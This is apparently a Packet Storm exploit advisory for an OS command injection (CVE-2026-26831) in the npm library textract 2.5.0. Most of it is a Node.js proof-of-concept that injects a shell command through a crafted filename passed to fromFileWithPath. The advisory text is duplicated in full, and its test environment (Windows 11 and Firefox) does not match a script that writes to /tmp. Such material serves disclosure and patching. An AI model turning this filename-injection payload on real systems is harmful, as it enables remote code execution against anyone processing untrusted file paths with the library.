9.8
/ 10
CRITICAL
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Description
In textract version 2.5.0, a security vulnerability allows OS command injection when untrusted file paths are processed by the library...
Basic Information
ID
PACKETSTORM:219858
Published
Apr 27, 2026 at 00:00
Affected Product
Affected Versions
==================================================================================================================================
| # Title : textract 2.5.0 OS Command Injection via Unsafe Filename Handling Leading to RCE |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.npmjs.com/package/textract |
==================================================================================================================================
[+] Summary : In textract version 2.5.0, a security vulnerability allows OS command injection when untrusted file paths are processed by the library.
[+] POC : exploit-basic.js
const textract = require('textract');
const maliciousFileName = 'test"; touch /tmp/pwned.txt; echo ".doc';
console.log("[+] CVE-2026-26831 - textract OS Command Injection Exploit");
console.log("[+] Malicious filename:", maliciousFileName);
console.log("[+] Attempting to extract text from malicious file...");
textract.fromFileWithPath(maliciousFileName, { preserveLineBreaks: true }, (error, text) => {
if (error) {
console.log("[!] Extraction failed (but command may have executed)");
console.log("Error:", error.message);
} else {
console.log("[+] Extraction completed (injection might still have worked)");
console.log("Extracted text:", text);
}
console.log("[*] Check if command executed: ls -la /tmp/pwned.txt");
});
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================
| # Title : textract 2.5.0 OS Command Injection via Unsafe Filename Handling Leading to RCE |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.npmjs.com/package/textract |
==================================================================================================================================
[+] Summary : In textract version 2.5.0, a security vulnerability allows OS command injection when untrusted file paths are processed by the library.
[+] POC : exploit-basic.js
const textract = require('textract');
const maliciousFileName = 'test"; touch /tmp/pwned.txt; echo ".doc';
console.log("[+] CVE-2026-26831 - textract OS Command Injection Exploit");
console.log("[+] Malicious filename:", maliciousFileName);
console.log("[+] Attempting to extract text from malicious file...");
textract.fromFileWithPath(maliciousFileName, { preserveLineBreaks: true }, (error, text) => {
if (error) {
console.log("[!] Extraction failed (but command may have executed)");
console.log("Error:", error.message);
} else {
console.log("[+] Extraction completed (injection might still have worked)");
console.log("Extracted text:", text);
}
console.log("[*] Check if command executed: ls -la /tmp/pwned.txt");
});
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================